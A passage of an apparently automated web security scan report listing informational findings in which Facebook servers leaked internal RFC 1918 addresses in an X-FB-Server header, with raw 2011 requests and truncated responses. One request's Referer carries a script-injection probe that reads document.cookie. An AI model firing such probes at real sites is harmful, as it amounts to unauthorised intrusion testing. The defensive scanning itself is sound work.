Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Mon, 18 Apr 2011 03:19:40 GMT
X-FB-Server: 10.30.146.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=29137202
Expires: Tue, 17 Apr 2012 18:32:13 GMT
Date: Mon, 16 May 2011 12:52:11 GMT
Connection: close
Content-Length: 5615

/*1303151604,169775811*/

if (window.CavalryLogger) { CavalryLogger.start_js(["JRfiS"]); }

var XD={_callbacks:[],_opts:{autoResize:false,allowShrink:true,channelUrl:null,hideOverflow:false,newResizeM
...[SNIP]...

22.14. http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yT/r/Gny22VYkiF8.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.148.192

Request

GET /rsrc.php/v1/yT/r/Gny22VYkiF8.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30896222
Expires: Tue, 08 May 2012 03:02:03 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 464

/*1304910165,169776320*/

.sp_bxn2lv{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_394e
...[SNIP]...

22.15. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yW/r/qCyv4dtIhXX.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.148.190

Request

GET /rsrc.php/v1/yW/r/qCyv4dtIhXX.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224000
Expires: Fri, 11 May 2012 22:05:01 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 749

/*1305238020,169776318*/

.sp_2bj2fu{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png);background-repeat:no-repeat;display:inline-block;height:14px;width:11px}
.sx_7c27
...[SNIP]...

22.16. http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yX/r/cw0X-OuHro4.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.69.185

Request

GET /rsrc.php/v1/yX/r/cw0X-OuHro4.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224142
Expires: Fri, 11 May 2012 22:07:23 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 325

/*1305238024,176833977*/

.sp_35c3go{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png);background-repeat:no-repeat;display:inline-block;height:10px;width:13px}
.sx_0ae9
...[SNIP]...

22.17. http://static.ak.fbcdn.net/rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yZ/r/pnnjl6ACZdc.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.69.185

Request

GET /rsrc.php/v1/yZ/r/pnnjl6ACZdc.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Thu, 25 Feb 2010 14:35:38 -0800
X-Powered-By: HPHP
X-FB-Server: 10.138.69.185
Vary: Accept-Encoding
Cache-Control: public, max-age=24659496
Expires: Sat, 25 Feb 2012 22:36:38 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close
Content-Length: 261

/*1298673338,176833977*/

.profile-platform-pane{overflow:hidden;padding-right:0;position:relative;width:520px}
.profile-platform-pane pane-content{overflow:hidden}
.profile .app_tab{position:relative
...[SNIP]...

22.18. http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yd/r/zu6qmwS44NI.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.17.183

Request

GET /rsrc.php/v1/yd/r/zu6qmwS44NI.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Tue, 03 May 2011 19:11:00 GMT
X-FB-Server: 10.138.17.183
Vary: Accept-Encoding
Cache-Control: public, max-age=31224139
Expires: Fri, 11 May 2012 22:07:20 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 719

/*1305238023,176820663*/

.sp_8begw1{background-image:url(http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png);background-repeat:no-repeat;display:inline-block;height:16px;width:16px}
.sx_2ef4
...[SNIP]...

22.19. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/JpK09bsayNa.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/JpK09bsayNa.js

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.148.189

Request

GET /rsrc.php/v1/yi/r/JpK09bsayNa.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:56:54 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31224116
Expires: Fri, 11 May 2012 22:07:00 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close
Content-Length: 102365

/*1305238022,169776317*/

if (window.CavalryLogger) { CavalryLogger.start_js(["D\/yBL"]); }

function object(b){var a=new Function();a.prototype=b;return new a();}function is_scalar(a){return (/string
...[SNIP]...

22.20. http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/vGrfOJHPJkR.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yi/r/vGrfOJHPJkR.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.145.195

Request

GET /rsrc.php/v1/yi/r/vGrfOJHPJkR.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Mon, 09 May 2011 02:24:38 GMT
X-FB-Server: 10.30.145.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=30895780
Expires: Tue, 08 May 2012 02:54:41 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 1031

/*1304909649,169775555*/

#wall_section_header .uiSelectorButton,#wall_section_header .uiSelectorButton:active,#wall_section_header .uiSelectorButton:focus,#wall_section_header .uiSelectorButton:hover
...[SNIP]...

22.21. http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yq/r/dDcIjg2q0Sp.css

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.147.195

Request

GET /rsrc.php/v1/yq/r/dDcIjg2q0Sp.css HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
Last-Modified: Wed, 11 May 2011 05:30:31 GMT
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=31096283
Expires: Thu, 10 May 2012 10:43:32 GMT
Date: Mon, 16 May 2011 12:52:09 GMT
Connection: close
Content-Length: 26450

/*1305110529,169776067*/

body.fan_widget{background:transparent}
.fbDarkWidget .fan_box{color:#808080}
.fbDarkWidget .fan_box a{color:#ccc}
.fan_box .full_widget{border:solid 1px #94a3c4;background:w
...[SNIP]...

22.22. http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yv/r/ApyVrGzMbqQ.js

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.16.185

Request

GET /rsrc.php/v1/yv/r/ApyVrGzMbqQ.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/PrimeScratchCards

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Thu, 12 May 2011 21:57:34 GMT
X-FB-Server: 10.138.16.185
Vary: Accept-Encoding
Cache-Control: public, max-age=31224096
Expires: Fri, 11 May 2012 22:06:40 GMT
Date: Mon, 16 May 2011 12:45:04 GMT
Connection: close
Content-Length: 132054

/*1305238016,176820409*/

if (window.CavalryLogger) { CavalryLogger.start_js(["DfLLX"]); }

var DOMScroll={getScrollState:function(){var d=Vector2.getViewportDimensions();var a=Vector2.getDocumentDime
...[SNIP]...

22.23. http://static.ak.fbcdn.net/rsrc.php/v1/yx/r/L-db0ALpEr8.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yx/r/L-db0ALpEr8.js

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.17.186

Request

GET /rsrc.php/v1/yx/r/L-db0ALpEr8.js HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/likebox.php?api_key=115813460972&channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D1%23cb%3Dfc208483563d2%26origin%3Dhttp%253A%252F%252Fwww.metacafe.com%252Ffc9e99a80b4bc2%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&connections=0&header=true&height=62&id=314888464487&locale=en_US&sdk=joey&show_faces=false&stream=false&width=292

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
Last-Modified: Tue, 10 May 2011 05:43:30 GMT
X-FB-Server: 10.138.17.186
Vary: Accept-Encoding
Cache-Control: public, max-age=31004184
Expires: Wed, 09 May 2012 09:08:35 GMT
Date: Mon, 16 May 2011 12:52:11 GMT
Connection: close
Content-Length: 60989

/*1305018491,176820666*/

if (window.CavalryLogger) { CavalryLogger.start_js(["dO6dA"]); }

WidgetArbiter={_findSiblings:function(){if(WidgetArbiter._siblings)return;WidgetArbiter._siblings=[];for(var
...[SNIP]...

22.24. http://static.ak.fbcdn.net/rsrc.php/v1/z5/r/55ZG1uMFCrx.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z5/r/55ZG1uMFCrx.png

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.30.148.189

Request

GET /rsrc.php/v1/z5/r/55ZG1uMFCrx.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yd/r/zu6qmwS44NI.css

Response

HTTP/1.1 200 OK
Content-Length: 1544
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:39 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30894502
Expires: Tue, 08 May 2012 02:33:24 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.............(    .`...sPLTE......;Y.G....b..R......333...}}}...~P...._er...OUglllkkk........m{{{...^^^.r.......[[[...........o.vIDDD.....................Kg...........U.........W.........
...[SNIP]...

22.25. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response (X-FB-Server header): 10.138.17.185

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.metacafe.com/fplayer/?4702d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ebe96a23f3a3=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:52:55 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Cache-Control: public, max-age=26118177
Expires: Tue, 13 Mar 2012 19:52:41 GMT
Date: Mon, 16 May 2011 12:49:44 GMT
Connection: close
Content-Length: 1900

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

22.26. http://static.ak.fbcdn.net/rsrc.php/v1/zC/r/5b5JL166gaA.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zC/r/5b5JL166gaA.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zC/r/5b5JL166gaA.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/qCyv4dtIhXX.css

Response

HTTP/1.1 200 OK
Content-Length: 691
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:39 GMT
X-FB-Server: 10.30.148.189
X-Cnection: close
Cache-Control: public, max-age=30894566
Expires: Tue, 08 May 2012 02:34:28 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.......N......b.,...zIDATx...1k.Q......L......Y. ..q.XI..L...X.4b%((B.....irpU.I+...V'3a.Y......w.G.~Y.eo~7o.]..D.a1.|4.1D.....J.    ...<I....I~.#..2...i+9TJ*........KD.....8'..H2.b.wE...
...[SNIP]...

22.27. http://static.ak.fbcdn.net/rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zD/r/B4K_BWwP7P5.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zD/r/B4K_BWwP7P5.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/R9NKeEUZ860.css

Response

HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Sun, 14 Mar 2010 12:51:27 -0700
X-Powered-By: HPHP
X-FB-Server: 10.30.147.195
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=26118385
Expires: Tue, 13 Mar 2012 19:51:26 GMT
Date: Mon, 16 May 2011 12:45:01 GMT
Connection: close
Content-Length: 1009

.PNG
.
...IHDR.............l.`o....PLTE...{..p..cy.h~.....................................Jd........................................o.Uk.Pi.MZt.\t.Ys.]v.u.[......_x................[t.Xr.......c{.p.V
...[SNIP]...

22.28. http://static.ak.fbcdn.net/rsrc.php/v1/zM/r/3CROxDf49ph.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zM/r/3CROxDf49ph.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zM/r/3CROxDf49ph.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yT/r/Gny22VYkiF8.css

Response

HTTP/1.1 200 OK
Content-Length: 589
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 19:09:40 GMT
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=30896306
Expires: Tue, 08 May 2012 03:03:28 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR...!...F.....u......PLTE.........^uqCW..............................T\l.U....x......N..........0D.l}.......q.................{.......................v......%....................;....
...[SNIP]...

22.29. http://static.ak.fbcdn.net/rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/zf/r/E6Qp_Akh2Vb.png HTTP/1.1
Host: static.ak.fbcdn.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/cw0X-OuHro4.css

Response

HTTP/1.1 200 OK
Content-Length: 267
Content-Type: image/png
Last-Modified: Tue, 03 May 2011 18:06:32 GMT
X-FB-Server: 10.30.148.190
X-Cnection: close
Cache-Control: public, max-age=30894588
Expires: Tue, 08 May 2012 02:34:50 GMT
Date: Mon, 16 May 2011 12:45:02 GMT
Connection: close

.PNG
.
...IHDR.............f.~s...BPLTE...CX.CX.......CY....iiiPi...............................Pi.BW....}.......tRNS.@..f...wIDATx^..I..0.DQuk..0...*r0.\...W*.d9...H.w....tS.E.8...W..7.?Z.[..J+@\
...[SNIP]...

22.30. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTfED2OUFMXxmZkOCiFGO; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=szS-2; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.116.65
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29704

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.31. http://www.facebook.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /?ref=ts HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=OxnRTSnNr7_aB426uwgNhTYi; expires=Wed, 15-May-2013 12:31:55 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=9diln; path=/; domain=.facebook.com
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F%3Fref%3Dts; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.104.41
Connection: close
Date: Mon, 16 May 2011 12:31:55 GMT
Content-Length: 29884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

22.32. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
X-XSS-Protection: 0
Set-Cookie: datr=PRnRTabFyBz2fUR8tW4oYCwo; expires=Wed, 15-May-2013 12:31:57 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: lsd=ci4lk; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.27.42
Connection: close
Date: Mon, 16 May 2011 12:31:57 GMT
Content-Length: 35761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schem
...[SNIP]...

22.33. http://www.facebook.com/PrimeScratchCards

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /PrimeScratchCards

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /PrimeScratchCards HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
